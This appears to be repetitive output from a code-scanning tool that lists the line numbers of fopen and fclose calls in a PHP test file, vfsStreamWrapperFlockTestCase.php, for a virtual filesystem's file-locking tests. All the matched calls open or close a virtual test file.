    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne118: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne135: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne153: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne154: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne173: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne174: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne192: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne193: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne209: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne226: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne227: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne247: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne264: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne265: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne283: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne300: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne301: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne319: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne336: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne353: $fp1   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne354: $fp2   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne376: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne394: $fp = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne410: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne411: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne429: $fp1 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne430: $fp2 = fopen(vfsStream::url('root/foo.txt'), 'rb');
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fclose was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne65: fclose($fp);
    Ligne80: fclose($fp);
    Ligne95: fclose($fp);
    Ligne109: fclose($fp);
    Ligne124: fclose($fp);
    Ligne142: fclose($fp);
    Ligne161: fclose($fp1);
    Ligne162: fclose($fp2);
    Ligne180: fclose($fp1);
    Ligne181: fclose($fp2);
    Ligne199: fclose($fp1);
    Ligne200: fclose($fp2);
    Ligne215: fclose($fp);
    Ligne235: fclose($fp1);
    Ligne236: fclose($fp2);
    Ligne253: fclose($fp);
    Ligne271: fclose($fp1);
    Ligne272: fclose($fp2);
    Ligne289: fclose($fp);
    Ligne307: fclose($fp1);
    Ligne308: fclose($fp2);
    Ligne325: fclose($fp);
    Ligne342: fclose($fp);
    Ligne362: fclose($fp1);
    Ligne363: fclose($fp2);
    Ligne378: fclose($fp);
    Ligne396: fclose($fp);
    Ligne413: fclose($fp1);
    Ligne418: fclose($fp2);
    Ligne432: fclose($fp1);
    Ligne437: fclose($fp2);
    fopen was found in the file vfsStreamWrapperFlockTestCase.php
    Ligne60: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne75: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne90: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
    Ligne104: $fp   = fopen(vfsStream::url('root/foo.txt'), 'rb');
